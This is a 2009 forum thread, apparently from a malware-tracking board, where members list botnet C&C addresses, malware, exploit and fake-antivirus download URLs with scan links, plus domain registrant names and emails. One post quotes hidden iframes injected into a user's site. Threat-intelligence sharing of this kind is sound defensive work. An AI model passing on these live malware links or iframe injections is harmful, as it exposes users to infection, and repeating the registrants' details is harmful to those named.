Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=aa09ec5696ee8105d36a31d370d3a606)

Botnet C&C:
213.182.197.249
Code: [Select]
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
Registrant: Chen / chen.poon1732646@ yahoo.com

Botnet C&C:
78.129.166.5
Code: [Select]
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=1c8ae7bb70a466f64d5ed8f74df829bfe&format=html)
Registrant: SmithJohn / Chehhost@ admin.ru
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 05:42:36 pm
91.209.163.201 - vl01.c76.fvtn.net
Code: [Select]
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php

91.209.163.202 - vl02.c76.fvtn.net
Code: [Select]
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php

91.209.163.203 - vl03.c76.fvtn.net
Code: [Select]
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php

same file:
Quote
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal (http://www.virustotal.com/analisis/d01ac3e0cd1e08afc94cf0f79bd34489) - 12/40 (30%)

Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net

related to: http://www.siteadvisor.com/sites/live-player.com (http://www.siteadvisor.com/sites/live-player.com)
Title: Re: daily something......
Post by: SysAdMini on May 19, 2009, 07:28:26 pm
Code: [Select]
filesstoragesarchive.com/softwarefortubeview.42002.exehttp://www.virustotal.com/analisis/e28f31c90582938ebfb7674f6136ad80 3/40
http://www.threatexpert.com/report.aspx?md5=f15dd0112f6f77dbce18d349dd65af79
Title: Re: daily something......
Post by: CkreM on May 20, 2009, 05:22:23 am
Emold:
Code: [Select]
ku98.biz/ghost/dia.exehttp://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
Code: [Select]
rezident77.ru/files/cry.exehttp://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
Code: [Select]
121.13.55.49/setup.exe
79.181.99.78/setup.exe
Title: Re: daily something......
Post by: CkreM on May 21, 2009, 06:20:21 am
Trojan:
Code: [Select]
samog0n.info/analyse/3xNt0f6b9e3R.exehttp://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
Code: [Select]
tamporn.net/indir.exe http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan
Code: [Select]
yourelitehosting.ru/explorer.exehttp://www.virustotal.com/analisis/b8fcb40a031230efbfaa9b3e0ff6e8a9

Redirects to rogue:
Code: [Select]
spyware-systems.info/0/go.php?sid=2 Exploit/trojan:
Code: [Select]
dr-w-corporation.ru/404/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=ceda3c3478def91606b1f1eff10aee05&t=1242931942&type=js
Title: Re: daily something......
Post by: Malware-Web-Threats on May 25, 2009, 12:37:40 am
redirects:
Code: [Select]
hxxp://tvnameshop.cn:8080/ts/in.cgi?pepsi19
exploits:
Code: [Select]
hxxp://litetopseeksite.cn:8080/index.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=11608bcd2beae11a346c7ce59dc1b66a&t=1243207563&type=js)
pdf:
Code: [Select]
hxxp://litetopseeksite.cn:8080/cache/readme.pdf
VirusTotal (http://www.virustotal.com/analisis/e0cc1067f80918d270ff280f5118f8d4c5d1f59a99ce9329aadafa8c859e8e0c-1243207236) - 10/40 (25.00%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=95c738bfe5a01b4cc30415d9368e2f9d&t=1243207896&type=js)
flash:
Code: [Select]
hxxp://litetopseeksite.cn:8080/cache/flash.swf
VirusTotal (http://www.virustotal.com/analisis/1feb0cc84665dfab4ebf8bf123ea106cbefc0967e7d0446a003c4411a5d4b42f-1243207241) - 11/39 (28.21%)
exe:
Code: [Select]
hxxp://litetopseeksite.cn:8080/load.php
VirusTotal (http://www.virustotal.com/analisis/284a014530738b8df40ad37d145eb3e1a547e51cb47461ee469269fa4df12fcb-1243207094) - 2/39 (5.13%)

Registrant: Scott Bell / ScottKBell@ missiongossip.com
Registrant: Michelle Rea / rea@ cybernauttech.com
Title: Re: daily something......
Post by: CkreM on May 25, 2009, 06:39:27 am
few trojans:
Code: [Select]
contempt.fileave.com/update.exehttp://www.virustotal.com/analisis/a9611719a2debd0ce94827725344b924b59a7dceb3b88a5a7373e63b21ea3a4a-1243232016
Code: [Select]
contempt.fileave.com/install_flash_player.exehttp://www.virustotal.com/analisis/7a0c6497ed0fedc5eb92b63f7c79d9f6fddaf93d6dcc92bb8c869bc9da354aa9-1243232028
Code: [Select]
contempt.fileave.com/update!!.exehttp://www.virustotal.com/analisis/eb6312bd3a633c4dc29bd3c6a8ed818034da1f9b619ef71e0beb549c4560dea8-1243232049
Code: [Select]
ebnetwork.biz/bot.exehttp://www.virustotal.com/analisis/36e867e35665340c782c1d029d4f812e78a2c1b9b06c8f65e11aa4ecf249efc2-1243232229

Koobface:
Code: [Select]
82.120.80.136/setup.exe
72.26.145.118/setup.exe

Exploit/trojan Murlo:
Code: [Select]
usrvzi.ruhttp://wepawet.iseclab.org/view.php?hash=07cb0602a03e0538ce9e630d5881e8d2&t=1243233325&type=js

Fake AV loader:
Code: [Select]
stroika2009.ru/porn-tube.avi.exe
http://www.virustotal.com/analisis/15d4ed789d3872463614ff54804ddebc07ae67ea6ab44efd80937ede4f33191d-1243233171

Fake AV:
Code: [Select]
pornotubeonline10.com/scan/Fake payment site:
Code: [Select]
2payon.com/pp/?id=356
Title: Re: daily something......
Post by: CkreM on May 26, 2009, 06:15:17 am
Trojan Emold:
Code: [Select]
interepass.com/ldr/main.exehttp://www.virustotal.com/analisis/49925c768805484b4fcd2eb62d0d72765b7b40c62cbe6cceaad4d2187eaac444-1243317300
Trojan:
Code: [Select]
89.149.242.25/cc/rf5.exehttp://www.virustotal.com/analisis/6626bc1283eb86b9afdf73ee4a24be67734fb0be1c81dda3e7d3731f77064c30-1243311118
Trojan:
Code: [Select]
us18.ru/d/1.exehttp://www.virustotal.com/analisis/21c89616b4b86dff6e1edf71c301a516b0dd477811bf7398a38743868a24e7db-1243311158
Trojan
Code: [Select]
pizdhelp.com/codec.exe
loyalbox.biz/codec.exe
http://www.virustotal.com/analisis/3f952397ee3a0fab7f828977e96d278be7e60f43de6f495c1fb7e7579cfcf616-1243317473

Fake av scan:
Code: [Select]
porno-online-tube.com/scan/
note4scan.info
greattoolset.com

Fake AV:
Code: [Select]
dwnld.showpromo-offer.com/secure/069d079c64e0350e7ba812895655fbf0/4a1b65bd/srm/srm_free_setup.exehttp://www.virustotal.com/analisis/af072ce2b07e627e27035e85bfd0ab74ac9de16b8166ef40d4b11455ecbe1b7e-1243317795
Redirects to fake AV:
Code: [Select]
trafdriver.com/in.cgi?10
Exploit/trojan:
Code: [Select]
freehostwap.com/in.phphttp://wepawet.iseclab.org/view.php?hash=d89affb2687f08a4310d2e29a79d0b0f&t=1243320248&type=js
Title: Re: daily something......
Post by: sursmurf on May 26, 2009, 12:57:37 pm
PDF:
Code: [Select]
http://92.60.176.45/s/getfile.php?f=pdf
[5/39]
http://www.virustotal.com/analisis/c958c661bc404cd8f82ccad7143b82937eeebafd27226e80feef3b5ddd92ec99-1243341305

Trojan/dropper:
Code: [Select]
http://92.60.176.45/s/getexe.php?h=1
[7/39]
http://www.virustotal.com/analisis/e1b5d1b5c13891d274ec6fe17a405ec234a2368b2ee5720c4d53a508ff359465-1243341362
Title: Re: daily something......
Post by: sparsha on May 27, 2009, 02:53:05 am
Rogue Application related domains:

Code: [Select]
Angantivirus09.com
Ang-antivirus09.com
Angantivirus09.info


best-protect-av1.info
download.best-protect-av1.info


securityonlinesite.com/hitin.php?land=20&affid=20100
Title: Re: daily something......
Post by: CkreM on May 27, 2009, 03:26:31 am
Exploit/trojan:
Code: [Select]
leosex.org/nn/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=eb94cbec20844957ee85c8e95f272dfc&t=1243391424&type=js
Trojan(seemed like virut to me)
Code: [Select]
ileron.cn/dll/abb.txthttp://www.virustotal.com/analisis/452e31c95952af674501a0519e63741568a1a3ba6267abc559b461812d761b70-1243392178
Trojan:
Code: [Select]
ileron.cn/dll/em.txthttp://www.virustotal.com/analisis/9b9871886640affa7fa13ebcb404540b10c862c9bf88372b184060f8eb2d1c37-1243392469
Title: Re: daily something......
Post by: CkreM on May 27, 2009, 06:44:23 am
Fake AV:
Code: [Select]
truesafetyweb.com
securityonlinesite.com
Title: Re: daily something......
Post by: Malware-Web-Threats on May 28, 2009, 06:21:58 am
70.85.142.250 - fa.8e.5546.static.theplanet.com

redirects:
Code: [Select]
thefilmmusic.cn:8080/ts/in.cgi?pepsi16
mynewnameshop.cn:8080/ts/in.cgi?pepsi25
usednamestore.cn:8080/ts/in.cgi?pepsi23
namebuyfilmlife.cn:8080/ts/in.cgi?pepsi23
mediahomenameshoppicture.cn:8080/ts/in.cgi?pepsi17
homenameworld.cn:8080/ts/in.cgi?pepsi17
technologybigtop.cn:8080/ts/in.cgi?pepsi17

exploits / trojan:
Code: [Select]
litetopdiscoversite.cn:8080/index.php
litetopdiscoversite.cn:8080/load.php
litetopfinddirect.cn:8080/index.php
litetopfinddirect.cn:8080/load.php
Title: Re: daily something......
Post by: CkreM on June 01, 2009, 08:06:51 am
PDF exploit:
Code: [Select]
cutlot.cn/cache/readme.pdfhttp://wepawet.iseclab.org/view.php?hash=175471e264f45086cc76d243f2d434da&t=1243755537&type=js
Flash exploit:
Code: [Select]
cutlot.cn/cache/flash.swfhttp://wepawet.iseclab.org/view.php?hash=b3b47f2539fcd19831f1b69463f463aa&type=swf
the downloaded trojan(0 detection on VT)
Code: [Select]
bestlitediscover.cn:8080/landig.php?id=8http://www.virustotal.com/analisis/cbdc2ddd3d050e55863f645efe12a3b55abec042a8d4f638788669e6431683b3-1243839114
communicates with
Code: [Select]
78.109.29.116/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=606178701&rnd=981633 (on MDL)


Code: [Select]
www.zbbey.com/n/http://wepawet.iseclab.org/view.php?hash=47f6d25611621daf759de1bf372b9633&t=1243757577&type=js
PDF exploit:
Code: [Select]
www.zbbey.com/n/spl/pdf.pdfhttp://wepawet.cs.ucsb.edu/view.php?type=js&hash=15b110fd28204a9b64716abda5cd6db5&t=1243757463
the downloaded trojan:
Code: [Select]
zbbey.com/n/exe.phphttp://www.virustotal.com/analisis/11d539235f368547b20854cbbcfadee90c4c71d4c8a9e78fa6f6011b30f3f423-1243850579


Few trojans:
Code: [Select]
www.mcdonaldsuck.com/e/eg.exehttp://www.virustotal.com/analisis/6471bb8364de0ffc7775daa615631d226030280bcd4b8da40cb6ad8058e7b8b2-1243840368
Code: [Select]
www.mcdonaldsuck.com/e/sb.exehttp://www.virustotal.com/analisis/6ab0ac53f3c91abe493b9423fe71bb6f57ba728a9dd7f888d85ed117c4fe78ca-1243840496
Code: [Select]
www.mcdonaldsuck.com/e/238.exehttp://www.virustotal.com/analisis/097d7a0907216b6395f4e88a3b847cb15a17f4166367a7c2b42518dd3a4c8836-1243840661
Code: [Select]
www.mcdonaldsuck.com/e/ick.exehttp://www.virustotal.com/analisis/51f7ed9fa7f032ab1fd3acf7fc2eef55c62b15128b46d697405d67778093286a-1243840855
Code: [Select]
www.mcdonaldsuck.com/e/lich.exehttp://www.virustotal.com/analisis/ac62cbe52183d6f60f683548dde10dd1ba814fcab8ccc6aa3beadfb646c46bb7-1243841074
Code: [Select]
sotana.su/1.exehttp://www.virustotal.com/analisis/cb70d5e0ba1425ca49142a598528617846834aab9129677060d3568485d69080-1243841368
Code: [Select]
sexiland.ru/1.exehttp://www.virustotal.com/analisis/2a6c671dad587a06a18e751a3f22a0eb1659f73f915ec307dd65e2d59a5ae3c2-1243841184
Code: [Select]
sexiland.ru/bot.exehttp://www.virustotal.com/analisis/dc9913c8a788ce33a063de0f8d73c0e214eef3c6e63fc7a99fb8eff007f0cf06-1243841240
Code: [Select]
claremontfinance.org/voland.exehttp://www.virustotal.com/analisis/fc2c189b3242075ee4944afd6f4b60b7852dd73eea412ee20366cb082b16340d-1243841664
Code: [Select]
business-networks.info/data/images/ftp.exehttp://www.virustotal.com/analisis/eaa2a177b4e1b711b536a965bdf4bb1ba1eead4fca275dce6b124d5b87e9b824-1243841813
Code: [Select]
89.149.242.25/ededed3.exehttp://www.virustotal.com/analisis/76ef1bbe110c8ff041db0c67895d551769e9b85f08780c1242c6a2cc4026cdce-1243839486

Redirects to fake AV:
Code: [Select]
unmarine.info
powerball.3june2009.com
Fake AV:
Code: [Select]
counteringate.com/scan
loved-online-tube.com/scan/
first-antispyware.com/promo3/
the-best-antispyware.com/promo3/
Title: Re: daily something......
Post by: CkreM on June 01, 2009, 08:59:57 am
Exploits:
Code: [Select]
search-adverts.net/forum/index.phphttp://wepawet.iseclab.org/view.php?hash=f2974b1a652fd3bc3fac456d5175e1ab&t=1243847198&type=js
PDF:
Code: [Select]
search-adverts.net/forum/cache/readme.pdfFlash:
Code: [Select]
search-adverts.net/forum/cache/flash.swfKoobface:
Code: [Select]
search-adverts.net/forum/load.php?id=4http://www.virustotal.com/analisis/199690f5a30c1d9ff7d267cce6f7bab4b98195bdc8963a40c03f5146163a96a9-1243504185
Title: Re: daily something......
Post by: CkreM on June 02, 2009, 02:32:09 am
Rogue:
Code: [Select]
clean-windows-vista.com
registry-cleaner-2009.com/Setup.exe
Internet-explorer-cleaner.com/Setup.exe
registrycleanerpro.org/Setup.exe
http://www.virustotal.com/analisis/fa7bcca65a1c661f93a0a2d1031162e12a4c27d86f49686e65a02d40762f74f8-1243909438 (1/40)
The payment site(site seems legit and just offer it services):
Code: [Select]
plimus.com/jsp/buynow.jsp?contractId=2261798&templateId=678656
Title: Re: daily something......
Post by: CkreM on June 02, 2009, 06:51:06 am
Few Trojans:
Code: [Select]
avhtm.8866.org/files/av.exehttp://www.virustotal.com/analisis/969c0f517f279dd68898eea50bb9ce51092acc3eca79fe963500b82f5c0d222a-1243923005
Code: [Select]
091809.ru/bot.exehttp://www.virustotal.com/analisis/eabf8925b5e73d4a8c1ef091108c2144a506f953c2e392588d2b5c05189dc698-1243924307
Trojan Koobface:
Code: [Select]
videofx4you1.com/software/019d135faa/10180/1/Setup.exehttp://www.virustotal.com/analisis/e585df3a2b91e56951ecd6a03c73fd7b45b02e0ca2278130438b6467e823e202-1243924387
Code: [Select]
ultraphobia.com/ppcfile/godsname.exehttp://www.virustotal.com/analisis/8018cf6b613911e75f0a9f326bb4d18b86f3543cab781b21fa49893483c37804-1243924788
Code: [Select]
ultraphobia.com/ppcfile/freeserfer.exehttp://www.virustotal.com/analisis/da4177f7cec2b60dae6e7d67944b5ff54273c6d70549d63c4c6de584abece4a6-1243924927
Trojan Pinch:
Code: [Select]
treelives.cn/pnc/pexe.exehttp://www.virustotal.com/analisis/c0deb27bd735c3936bd84bd67d60b3c5450bffb6f051eb170370afb965a0dad1-1243925125

Exploits:
Code: [Select]
s76z.cn/data/http://wepawet.iseclab.org/view.php?hash=7bb7e6ca87c21a4310f276e54db9e102&t=1243847990&type=js
PDF:
Code: [Select]
s76z.cn/data/spl/pdf.pdfTrojan Oficla:
Code: [Select]
s76z.cn/data/exe.phphttp://www.virustotal.com/analisis/02c22fc3cd292700557f0a125a544225a51839754f3ad886ba38788f8e5aaa3f-1243815948

Exploits:
Code: [Select]
treelives.cn/ru/index.phphttp://wepawet.iseclab.org/view.php?hash=db13b96a3f07c2433da03c406fa21000&t=1243849201&type=js
PDF:
Code: [Select]
treelives.cn/ru/iepdf.php?f=newTrojan oficla:
Code: [Select]
treelives.cn/ru/load.phphttp://www.virustotal.com/analisis/bcb7eb7c10a161a08a16249e653bfcd0c26ac97941ac5760525c27edadf383d8-1243796149
Title: Re: daily something......
Post by: SysAdMini on June 02, 2009, 07:10:35 pm
iframe directs to pfre.php
Code: [Select]
lgmin.com/image/index.php
pdf exploit
Code: [Select]
lgmin.com/image/pfre.php
payload is
Code: [Select]
http://lgmin.com/image/ouet.phphttp://www.virustotal.com/analisis/27b6a8bd0b5ccdd6d621cec888108f6c4f6f809319fad724f5c6f1aa94124a39-1243963662 3/40
CAT-QuickHeal   10.00   2009.06.02   (Suspicious) - DNAScan
Microsoft   1.4701   2009.06.02   VirTool:Win32/Obfuscator.FH
Symantec   1.4.4.12   2009.06.02   Suspicious.MH690.A
http://www.threatexpert.com/report.aspx?md5=995a4928b9d1da62bcda2c1db6dd4898

AdPack cpanel is
Code: [Select]
lgmin.com/image/admin.php
same kind of stuff can be found at fastinate.com/image/...
Title: Re: daily something......
Post by: sparsha on June 03, 2009, 09:20:49 am
Sites related Rogue Security Application

Code: [Select]
http://deluxe-protector.com/setup.exe
http://softwaredownloadcentercom.com/xpdel.exe

http://liveicqnetwork.cn/go.php?id=2018&key=56d5f0bd3&p=1
http://pricelessfinish.cn/go.php?id=2018-04&key=56d5f0bd3&p=1

http://pro-antivirus-scannerv2.com/1/?id=2018&smersh=c144eb244&back==TQ0yzz5McQNMI=M

http://safetywww.com/hitin.php?land=20&affid=20100
http://personal-antivirus-software.com/promo3/?aid=851
Title: Re: daily something......
Post by: SysAdMini on June 03, 2009, 09:08:11 pm
directs to "Messenger Infium" (trojan)
Code: [Select]
msnm.3eu.ru
Code: [Select]
albatros.ee/uploades/scr_dn/MInfium2009Final.exehttp://www.virustotal.com/analisis/9075621fd2b778431b576b9fef8ece2af86ff98f2f1516b62078f26b700f17c2-1244062941 2/40
K7AntiVirus   7.10.752   2009.06.02   Trojan.Win32.Malware.1
TheHacker   6.3.4.3.338   2009.06.03   Trojan/Agent.cikm
Title: Re: daily something......
Post by: CkreM on June 04, 2009, 08:37:07 am
Exploit(wepawet seem to fail on this one)
Code: [Select]
091809.ru/s/in.phpPDF:
Code: [Select]
091809.ru/s/pdf.phphttp://wepawet.iseclab.org/view.php?hash=f5b00bed476324a303df8f4b4d8ac8c1&t=1244100976&type=js
seems like abit alterd variant of Emold trojan:
Code: [Select]
091809.ru/s/load.php?id=3http://www.virustotal.com/analisis/05e9c38100c6d59e834be1b848ab824eefe741d358e969d5e11cf6853d6ab7f5-1244100358

FTPstealer:
Code: [Select]
club25plus.de/css/vv.exehttp://www.virustotal.com/analisis/1db0daee62d2103eab7c84383e05505b6d6612aaef14da7641f1ceabd6d2f65a-1244101252
Trojan:
Code: [Select]
club25plus.de/css/frfr5.exehttp://www.virustotal.com/analisis/e8165bde7ebbcd65464ee27f7121128885e91b373ce83a3adb53e1e1975ec5d8-1244101967

Fake AV:
Code: [Select]
tubepornolive.com/scan/
Exploits:
Code: [Select]
bfegrtuker.ru/bede/in.phphttp://wepawet.iseclab.org/view.php?hash=09d36363e30de64fc262c747c8e54d68&t=1244102863&type=js
PDF:
Code: [Select]
bfegrtuker.ru/bede/its/0.pdfFlash:
Code: [Select]
bfegrtuker.ru/bede/its/0.swfTrojan Oficla:
Code: [Select]
bfegrtuker.ru/bede/load.php?id=5
Trojan:
Code: [Select]
000007.ru/1007.exehttp://www.virustotal.com/analisis/b35aec13c9d8d5b92fd3ba42eb753f36a89b1798dfcd1068c62243f9d0e38e04-1244102905
Trojan:
Code: [Select]
234871938123.cn/svcshostes.exehttp://www.virustotal.com/analisis/80fb3f643f85d8f09f3e5f533a52917dfae9c6e009899602577b6113dabf0ec7-1244103136

Trojans(all seem to be Rustock):
Code: [Select]
yayandex.com/1.exehttp://www.virustotal.com/analisis/c9ab5cd07f75505444777caebc1ba203c4d6a3cfa079516f5b231f5cbea4cb6c-1244103292
Code: [Select]
yayandex.com/2.exehttp://www.virustotal.com/analisis/34f7a41324eaaaefd45357ed16f89b8a9add7e839c54fc4897610fc831e56a44-1244103465
Code: [Select]
yayandex.com/3love.exehttp://www.virustotal.com/analisis/1f0f682ac26bc3c2c3d3153b282e09e68c97277b0dfc49f3a97519d42033410d-1244103873
all communicate with:
Code: [Select]
yabombs.com/1/getcfg.php
Title: Re: daily something......
Post by: sparsha on June 04, 2009, 07:12:40 pm
Fake/Scare scanner

Code: [Select]
http://antimalwareliveproscannerv3.com/1/?id=2018&smersh=c144eb244&back==TQ2yTDxNMQOMI=N
Fake flash player - downloads Rogue

Code: [Select]
http://big-pornnet.com/promo1/get.php?aid=780&vname=flash_player_v11
Couple of links on the rotators

Code: [Select]
http://top-pornnet.com/promo3/?aid=763&vname=flash_player.exe
http://mybig-portal.com/promo3/?aid=763&vname=protect.exe
Title: Re: daily something......
Post by: CkreM on June 07, 2009, 06:07:13 am
Fake movie page:
Code: [Select]
tube-xxx-work.com/xplays.php?id=40016downloads:
Code: [Select]
exe-web-development.com/streamviewer.40016.exehttp://www.virustotal.com/analisis/76b8a3599fc04cfe7adecab36805615f82b7e73c8b8980f2ecbb3cd94cee5ba3-1244350815

Fake AV:
Code: [Select]
mysex-adult.com/promo1/soft/install-1557.exeRustock:
Code: [Select]
rarambler.com/ra/2.exehttp://www.virustotal.com/analisis/a67f6dcc6c43deaa623d88882cf591f742552615cc59cd3620cda86dbbbc618e-1244353129
Communicates with:
Code: [Select]
systemjud.com/start/admo/getcfg.php
Title: Re: daily something......
Post by: SysAdMini on June 07, 2009, 01:20:34 pm
Today a user reported the following:

Code: [Select]
i found these two in my site:

<iframe src=\"http://85.10.221.161/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>


<iframe src=\"http://global-analitics.com/in.cgi?2\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>

Code: [Select]
85.10.221.161/in.cgi?2
redirects to multiple exploits at

Code: [Select]
searchsuggest.cn/catalog/x.php?q=1
payload is
Code: [Select]
searchsuggest.cn/catalog/q.php?s=2'http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1243633951

I'm unable to download it from machine, don't know why.

The other url
Code: [Select]
global-analitics.com/in.cgi?2doesn't seem to work at the moment.
Title: Re: daily something......
Post by: MysteryFCM on June 07, 2009, 02:37:53 pm
Payload;

/catalog/bookz.pdf
http://www.virustotal.com/analisis/3fcbd6e988183b20a18c13f6125d41bc6ee346c7dd5a198bee4e5de8fdabc927-1244385255

/catalog/next.exe
http://www.virustotal.com/analisis/ad7686eb5e40fa0b4a874bf06a605f2ed44e6a17a7e7df48c7c25064c42f400a-1244385214

I was only able to grab them by feeding it the correct referer (x.php?q=1)

I can't get the other one to work either .....
Title: Re: daily something......
Post by: sparsha on June 08, 2009, 07:37:18 pm
System Security rogue related sites

Code: [Select]
http://nicleaner.com/hitin.php?land=20&affid=02941
http://nicleaner.com/download.php?affid=02941

http://bestscanjet.com/index.php?affid=09300
http://bestscanjet.com/download.php?affid=09300

http://Dapcleaner.com/hitin.php?land=20&affid=02941
http://dapcleaner.com/download.php?affid=02941

http://sucleaner.com/index.php?affid=02941
http://sucleaner.com/download.php?affid=02941

http://Websecurityread.com/hitin.php?land=20&affid=02941
http://websecurityread.com/download.php?affid=02941

http://Spyscansolution.com/hitin.php?land=20&affid=02941
http://spyscansolution.com/download.php?affid=00000
Title: Re: daily something......
Post by: XiTri on June 09, 2009, 05:07:16 am
Code: [Select]
http://e-point.com.ua/ratingz/load.php
Kaspersky - Trojan-Banker.Win32.Banker.aflq
McAfee verdict: PWS-Banker
Title: Re: daily something......
Post by: sparsha on June 09, 2009, 10:42:20 am
Win PC Defender rogue
Code: [Select]
http://pornotube911.com/codec/186.exe
http://downloadfixandlove.com/pcdef.exe
http://downloadfixandlove.com/file.exe

Antivirus System Pro
Code: [Select]
antivir2009pro.com
Inetantivir.com
Inetantivirus.com
Inetavirus.com
209.44.111.57/block.php?r=8.0
Title: Re: daily something......
Post by: promised on June 09, 2009, 11:08:00 am
onlinegames
Quote
2:http://61.160.247.37/xiao/aa1.exe
2:http://61.160.247.37/xiao/aa2.exe
2:http://61.160.247.37/xiao/aa3.exe
2:http://61.160.247.37/xiao/aa4.exe
2:http://61.160.247.37/xiao/aa5.exe
2:http://61.160.247.37/xiao/aa6.exe
2:http://61.160.247.37/xiao/aa7.exe
2:http://61.160.247.37/xiao/aa8.exe
2:http://61.160.247.37/xiao/aa9.exe
2:http://61.160.247.37/xiao/aa10.exe
2:http://61.160.247.37/xiao/aa11.exe
2:http://61.160.247.37/xiao/aa12.exe
2:http://61.160.247.37/xiao/aa13.exe
2:http://61.160.247.37/xiao/aa14.exe
2:http://61.160.247.37/xiao/aa15.exe
2:http://61.160.247.37/xiao/aa16.exe
2:http://61.160.247.37/xiao/aa17.exe
2:http://61.160.247.37/xiao/aa18.exe
2:http://61.160.247.37/xiao/aa19.exe
2:http://61.160.247.37/xiao/aa20.exe
2:http://61.160.247.37/xiao/aa21.exe
2:http://61.160.247.37/xiao/aa22.exe
2:http://61.160.247.37/xiao/aa23.exe
2:http://61.160.247.37/xiao/aa24.exe
2:http://61.160.247.37/xiao/aa25.exe
2:http://61.160.247.37/xiao/aa26.exe
2:http://61.160.247.37/xiao/aa27.exe
2:http://61.160.247.37/xiao/aa28.exe
2:http://61.160.247.37/xiao/aa29.exe
2:http://61.160.247.37/xiao/aa30.exe
2:http://61.160.247.37/xiao/aa31.exe
2:http://61.160.247.37/xiao/aa32.exe
2:http://61.160.247.37/xiao/aa33.exe
2:http://61.160.247.37/xiao/aa34.exe
2:http://61.160.247.37/xiao/aa35.exe
2:http://61.160.247.37/xiao/aa36.exe
2:http://61.160.247.37/xiao/1.exe
Title: Re: daily something......
Post by: promised on June 09, 2009, 11:09:59 am
onlinegames
Quote
hxxp://121.12.115.11:886/down/aa01.exe
hxxp://121.12.115.11:886/down/aa02c.exe
hxxp://121.12.115.11:886/down/ts.exe
hxxp://121.12.115.11:886/down/aa03d.exe
hxxp://121.12.115.11:886/down/aa04b.exe
hxxp://121.12.115.11:886/down/aa21g.exe
hxxp://121.12.115.11:886/down/aa05b.exe
hxxp://121.12.115.11:886/down/aa06d.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa08d.exe
hxxp://121.12.115.11:886/down/aa09a.exe
hxxp://121.12.115.11:886/down/aa10d.exe
hxxp://121.12.115.11:886/down/aa11a.exe
hxxp://121.12.115.11:886/down/aa12.exe
hxxp://121.12.115.11:886/down/aa13c.exe
hxxp://121.12.115.11:886/down/aa32e.exe
hxxp://121.12.115.11:886/down/aa33a.exe
hxxp://121.12.115.11:886/down/aa26d.exe
hxxp://121.12.115.11:886/down/aa27a.exe
hxxp://121.12.115.11:886/down/aa31b.exe
hxxp://121.12.115.11:886/down/aa15d.exe
hxxp://121.12.115.11:886/down/aa17.exe
hxxp://121.12.115.11:886/down/aa18a.exe
hxxp://121.12.115.11:886/down/aa19c.exe
hxxp://121.12.115.11:886/down/aa20a.exe
hxxp://121.12.115.11:886/down/aa29a.exe
hxxp://121.12.115.11:886/down/aa22.exe
hxxp://121.12.115.11:886/down/aa23a.exe
hxxp://121.12.115.11:886/down/aa24.exe
hxxp://121.12.115.11:886/down/aa25a.exe
hxxp://121.12.115.11:886/down/aa28.exe
hxxp://121.12.115.11:886/down/aa30.exe
hxxp://121.12.115.11:886/down/ms.exe
Title: Re: daily something......
Post by: sparsha on June 09, 2009, 11:44:46 am
Code: [Select]
http://av-guard.net/?uid=102&pid=3
Title: Re: daily something......
Post by: promised on June 09, 2009, 06:56:24 pm
onlinegames
Quote
hxxp://www.2a8k.cn/d/51.exe
hxxp://www.2a8k.cn/d/50.exe
hxxp://www.2a8k.cn/d/29.exe
hxxp://www.2a8k.cn/d/13.exe
hxxp://www.2a8k.cn/d/24.exe
hxxp://www.2a8k.cn/d/25.exe
hxxp://www.2a8k.cn/d/35.exe
hxxp://www.2a8k.cn/d/34.exe
hxxp://www.2a8k.cn/d/33.exe
hxxp://www.2a8k.cn/d/36.exe
hxxp://www.2a8k.cn/d/42.exe
hxxp://www.2a8k.cn/d/39.exe
hxxp://www.2a8k.cn/d/43.exe
hxxp://www.2a8k.cn/d/22.exe
hxxp://www.2a8k.cn/d/23.exe
hxxp://www.2a8k.cn/d/26.exe
hxxp://www.2a8k.cn/d/27.exe
hxxp://www.2a8k.cn/d/32.exe
hxxp://www.2a8k.cn/d/28.exe
hxxp://www.2a8k.cn/d/8.exe
hxxp://www.2a8k.cn/d/21.exe
hxxp://www.2a8k.cn/d/20.exe
